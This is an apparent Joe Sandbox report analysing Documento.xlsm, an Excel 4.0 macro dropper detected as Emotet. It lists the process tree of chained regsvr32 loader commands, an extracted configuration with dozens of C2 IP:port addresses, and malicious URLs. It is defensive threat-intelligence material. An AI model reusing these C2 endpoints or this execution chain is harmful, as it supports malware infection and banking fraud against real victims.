Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Documento.xlsm

Overview

General Information

Sample Name:Documento.xlsm
Analysis ID:578182
MD5:5acc6f1ff8366ddc895392da4e6a50e3
SHA1:45b3ef65a4dabdbbefec603fe3dca9bfb1c5c643
SHA256:0bb184f9c3e9cda4571bd806b90dbda484c331d9dce7af784405fd211f6c71c4
Tags:xlsm
Infos:

Detection

Hidden Macro 4.0 Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Regsvr32 Command Line Without DLL
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Network Activity
Found Excel 4.0 Macro with suspicious formulas
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Document exploit detected (UrlDownloadToFile)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Contains functionality to retrieve information about pressed keystrokes
Drops PE files to the user directory
Excel documents contains an embedded macro which executes code when the document is opened
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sigma detected: Excel Network Connections
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1592 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1220 cmdline: C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx MD5: 432BE6CF7311062633459EEF6B242FB5)
      • regsvr32.exe (PID: 2216 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj" MD5: 432BE6CF7311062633459EEF6B242FB5)
        • regsvr32.exe (PID: 2580 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akqqkkcyjpzjtkdl\yjsihfoifzocxh.bje" MD5: 432BE6CF7311062633459EEF6B242FB5)
          • regsvr32.exe (PID: 2188 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Jlwcmhlugcekbvod\wgwqcgkqco.zkn" MD5: 432BE6CF7311062633459EEF6B242FB5)
            • regsvr32.exe (PID: 2600 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wjoyn\vwxqtwr.dtt" MD5: 432BE6CF7311062633459EEF6B242FB5)
              • regsvr32.exe (PID: 1832 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Fypgzmyquzzcde\otyatzrmngwq.ngt" MD5: 432BE6CF7311062633459EEF6B242FB5)
                • regsvr32.exe (PID: 3000 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bwfagqlayjve\vhxv.yyo" MD5: 432BE6CF7311062633459EEF6B242FB5)
                  • regsvr32.exe (PID: 2684 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wajwuevzvdakzef\rsarmrhrfymvh.bdv" MD5: 432BE6CF7311062633459EEF6B242FB5)
                    • regsvr32.exe (PID: 2092 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qqnrprjtrrtdhqc\hwfqlqeqb.xee" MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["135.148.121.246:8080", "213.190.4.223:7080", "175.107.196.192:80", "46.55.222.11:443", "153.126.203.229:8080", "138.185.72.26:8080", "45.118.135.203:7080", "107.182.225.142:8080", "195.154.133.20:443", "79.172.212.216:8080", "129.232.188.93:443", "50.30.40.196:8080", "131.100.24.231:80", "58.227.42.236:80", "216.158.226.206:443", "45.118.115.99:8080", "51.254.140.238:7080", "173.212.193.249:8080", "110.232.117.186:8080", "81.0.236.90:443", "158.69.222.101:443", "103.75.201.2:443", "185.157.82.211:8080", "176.104.106.96:8080", "82.165.152.127:8080", "156.67.219.84:7080", "212.237.17.99:8080", "178.128.83.165:80", "162.243.175.63:443", "45.142.114.231:8080", "103.134.85.85:80", "178.79.147.66:8080", "31.24.158.56:8080", "103.75.201.4:443", "217.182.143.207:443", "159.8.59.82:8080", "164.68.99.3:8080", "209.126.98.206:8080", "207.38.84.195:8080", "119.235.255.201:8080", "212.24.98.99:8080", "212.237.56.116:7080", "50.116.54.215:443", "45.176.232.124:443", "203.114.109.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      0000000B.00000002.711848571.00000000001D0000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000005.00000002.451639810.0000000000150000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            00000004.00000002.445708809.00000000001C0000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              Click to see the 13 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              9.2.regsvr32.exe.190000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                9.2.regsvr32.exe.1e0000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  6.2.regsvr32.exe.7e0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    3.2.regsvr32.exe.160000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      7.2.regsvr32.exe.200000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                        Click to see the 22 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Regsvr32 Command Line Without DLL
                        Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj", CommandLine: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 1220, ProcessCommandLine: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj", ProcessId: 2216
                        Sigma detected: Microsoft Office Product Spawning Windows Shell
                        Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx, CommandLine: C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1592, ProcessCommandLine: C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx, ProcessId: 1220
                        Sigma detected: Regsvr32 Network Activity
                        Source: Network ConnectionAuthor: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 135.148.121.246, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 2092, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49168
                        Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0": Data: DestinationIp: 8.8.8.8, DestinationIsIpv6: false, DestinationPort: 53, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1592, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 52167
                        Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 1B 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1592, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for URL or domain
                        Source: https://135.148.121.246/jAvira URL Cloud: Label: malware
                        Source: https://135.148.121.246:8080/zPDHHDvtYQmewTlUqnNumfvSgAMeHhZGhBefDhmgdqyEKfqwiccH~AAvira URL Cloud: Label: malware
                        Source: https://135.148.121.246:8080/zPDHHDvtYQmewTlUqnNumfvSgAMeHhZGhBefDhmgdqyEKfqwot~HAvira URL Cloud: Label: malware
                        Source: https://135.148.121.246/bAvira URL Cloud: Label: malware
                        Found malware configuration
                        Source: 9.2.regsvr32.exe.190000.0.raw.unpackMalware Configuration Extractor: Emotet {"C2 list": ["135.148.121.246:8080", "213.190.4.223:7080", "175.107.196.192:80", "46.55.222.11:443", "153.126.203.229:8080", "138.185.72.26:8080", "45.118.135.203:7080", "107.182.225.142:8080", "195.154.133.20:443", "79.172.212.216:8080", "129.232.188.93:443", "50.30.40.196:8080", "131.100.24.231:80", "58.227.42.236:80", "216.158.226.206:443", "45.118.115.99:8080", "51.254.140.238:7080", "173.212.193.249:8080", "110.232.117.186:8080", "81.0.236.90:443", "158.69.222.101:443", "103.75.201.2:443", "185.157.82.211:8080", "176.104.106.96:8080", "82.165.152.127:8080", "156.67.219.84:7080", "212.237.17.99:8080", "178.128.83.165:80", "162.243.175.63:443", "45.142.114.231:8080", "103.134.85.85:80", "178.79.147.66:8080", "31.24.158.56:8080", "103.75.201.4:443", "217.182.143.207:443", "159.8.59.82:8080", "164.68.99.3:8080", "209.126.98.206:8080", "207.38.84.195:8080", "119.235.255.201:8080", "212.24.98.99:8080", "212.237.56.116:7080", "50.116.54.215:443", "45.176.232.124:443", "203.114.109.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2"]}
                        Multi AV Scanner detection for submitted file
                        Source: Documento.xlsmVirustotal: Detection: 40%Perma Link
                        Source: Documento.xlsmReversingLabs: Detection: 39%
                        Multi AV Scanner detection for domain / URL
                        Source: www.swaong.comVirustotal: Detection: 5%Perma Link
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000D150 SendMessageA,SendMessageA,SendMessageA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,SendMessageA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,SHGetFileInfoA,SendMessageA,SHGetFileInfoA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,SendMessageA,LoadCursorA,CopyIcon,LoadCursorFromFileA,ShowCursor,ShowCursor,SetSystemCursor,ShowCursor,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LoadMenuA,LoadIconA,_strncpy,VariantClear,VariantClear,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,VariantClear,VariantClear,VariantClear,VariantClear,3_2_1000D150
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1002084E __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,3_2_1002084E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1002A9C8 LoadIconA,FindFirstFileA,GetLastError,lstrlenA,SetLastError,__fullpath,__splitpath_s,__makepath_s,3_2_1002A9C8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_002627C2 FindFirstFileW,11_2_002627C2

                        Software Vulnerabilities

                        barindex
                        Document exploit detected (drops PE files)
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: BRqk58WkNweubruYwrLOt[1].dll.0.drJump to dropped file
                        Document exploit detected (creates forbidden files)
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BRqk58WkNweubruYwrLOt[1].dllJump to behavior
                        Document exploit detected (process start blacklist hit)
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
                        Document exploit detected (UrlDownloadToFile)
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 135.148.121.246:8080
                        Source: global trafficDNS query: name: www.swaong.com

                        Networking

                        barindex
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 135.148.121.246 144Jump to behavior
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorIPs: 135.148.121.246:8080
                        Source: Malware configuration extractorIPs: 213.190.4.223:7080
                        Source: Malware configuration extractorIPs: 175.107.196.192:80
                        Source: Malware configuration extractorIPs: 46.55.222.11:443
                        Source: Malware configuration extractorIPs: 153.126.203.229:8080
                        Source: Malware configuration extractorIPs: 138.185.72.26:8080
                        Source: Malware configuration extractorIPs: 45.118.135.203:7080
                        Source: Malware configuration extractorIPs: 107.182.225.142:8080
                        Source: Malware configuration extractorIPs: 195.154.133.20:443
                        Source: Malware configuration extractorIPs: 79.172.212.216:8080
                        Source: Malware configuration extractorIPs: 129.232.188.93:443
                        Source: Malware configuration extractorIPs: 50.30.40.196:8080
                        Source: Malware configuration extractorIPs: 131.100.24.231:80
                        Source: Malware configuration extractorIPs: 58.227.42.236:80
                        Source: Malware configuration extractorIPs: 216.158.226.206:443
                        Source: Malware configuration extractorIPs: 45.118.115.99:8080
                        Source: Malware configuration extractorIPs: 51.254.140.238:7080
                        Source: Malware configuration extractorIPs: 173.212.193.249:8080
                        Source: Malware configuration extractorIPs: 110.232.117.186:8080
                        Source: Malware configuration extractorIPs: 81.0.236.90:443
                        Source: Malware configuration extractorIPs: 158.69.222.101:443
                        Source: Malware configuration extractorIPs: 103.75.201.2:443
                        Source: Malware configuration extractorIPs: 185.157.82.211:8080
                        Source: Malware configuration extractorIPs: 176.104.106.96:8080
                        Source: Malware configuration extractorIPs: 82.165.152.127:8080
                        Source: Malware configuration extractorIPs: 156.67.219.84:7080
                        Source: Malware configuration extractorIPs: 212.237.17.99:8080
                        Source: Malware configuration extractorIPs: 178.128.83.165:80
                        Source: Malware configuration extractorIPs: 162.243.175.63:443
                        Source: Malware configuration extractorIPs: 45.142.114.231:8080
                        Source: Malware configuration extractorIPs: 103.134.85.85:80
                        Source: Malware configuration extractorIPs: 178.79.147.66:8080
                        Source: Malware configuration extractorIPs: 31.24.158.56:8080
                        Source: Malware configuration extractorIPs: 103.75.201.4:443
                        Source: Malware configuration extractorIPs: 217.182.143.207:443
                        Source: Malware configuration extractorIPs: 159.8.59.82:8080
                        Source: Malware configuration extractorIPs: 164.68.99.3:8080
                        Source: Malware configuration extractorIPs: 209.126.98.206:8080
                        Source: Malware configuration extractorIPs: 207.38.84.195:8080
                        Source: Malware configuration extractorIPs: 119.235.255.201:8080
                        Source: Malware configuration extractorIPs: 212.24.98.99:8080
                        Source: Malware configuration extractorIPs: 212.237.56.116:7080
                        Source: Malware configuration extractorIPs: 50.116.54.215:443
                        Source: Malware configuration extractorIPs: 45.176.232.124:443
                        Source: Malware configuration extractorIPs: 203.114.109.124:443
                        Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
                        Source: Joe Sandbox ViewASN Name: S-NET-ASPL S-NET-ASPL
                        Source: Joe Sandbox ViewIP Address: 195.154.133.20 195.154.133.20
                        Source: Joe Sandbox ViewIP Address: 185.157.82.211 185.157.82.211
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 135.148.121.246:8080
                        Source: unknownNetwork traffic detected: IP country count 24
                        Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                        Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                        Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                        Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                        Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                        Source: 77EC63BDA74BD0D0E0426DC8F80085060.11.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                        Source: regsvr32.exe, 0000000B.00000002.711992789.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab-
                        Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enbH
                        Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                        Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                        Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                        Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                        Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                        Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                        Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                        Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                        Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                        Source: regsvr32.exe, 0000000B.00000002.711970606.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.148.121.246/b
                        Source: regsvr32.exe, 0000000B.00000002.711970606.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.148.121.246/j
                        Source: regsvr32.exe, 0000000B.00000002.711992789.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.148.121.246:8080/zPDHHDvtYQmewTlUqnNumfvSgAMeHhZGhBefDhmgdqyEKfqwiccH~A
                        Source: regsvr32.exe, 0000000B.00000002.711992789.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.148.121.246:8080/zPDHHDvtYQmewTlUqnNumfvSgAMeHhZGhBefDhmgdqyEKfqwot~H
                        Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3429A7BE.jpegJump to behavior
                        Source: unknownDNS traffic detected: queries for: www.swaong.com
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1002818E recv,3_2_1002818E
                        Source: unknownTCP traffic detected without corresponding DNS query: 135.148.121.246
                        Source: unknownTCP traffic detected without corresponding DNS query: 135.148.121.246
                        Source: unknownTCP traffic detected without corresponding DNS query: 135.148.121.246
                        Source: unknownTCP traffic detected without corresponding DNS query: 135.148.121.246
                        Source: unknownTCP traffic detected without corresponding DNS query: 135.148.121.246
                        Source: unknownTCP traffic detected without corresponding DNS query: 135.148.121.246
                        Source: unknownTCP traffic detected without corresponding DNS query: 135.148.121.246
                        Source: unknownTCP traffic detected without corresponding DNS query: 135.148.121.246
                        Source: unknownTCP traffic detected without corresponding DNS query: 135.148.121.246
                        Source: unknownTCP traffic detected without corresponding DNS query: 135.148.121.246
                        Source: unknownTCP traffic detected without corresponding DNS query: 135.148.121.246
                        Source: regsvr32.exe, 0000000B.00000002.712004604.0000000000506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1002B47F SendMessageA,SendMessageA,GetAsyncKeyState,SendMessageA,3_2_1002B47F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100392CA __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,3_2_100392CA
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1001A057 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,3_2_1001A057
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1003684C ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,3_2_1003684C

                        E-Banking Fraud

                        barindex
                        Yara detected Emotet
                        Source: Yara matchFile source: 9.2.regsvr32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.regsvr32.exe.1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.7e0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.regsvr32.exe.160000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.regsvr32.exe.200000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.regsvr32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.regsvr32.exe.190000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.regsvr32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.regsvr32.exe.1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.regsvr32.exe.230000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.regsvr32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.regsvr32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.regsvr32.exe.1a0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.regsvr32.exe.180000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.regsvr32.exe.300000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.regsvr32.exe.260000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.8d0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.regsvr32.exe.240000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.7e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.regsvr32.exe.190000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.regsvr32.exe.230000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.regsvr32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.regsvr32.exe.150000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.711848571.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.451639810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.445708809.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
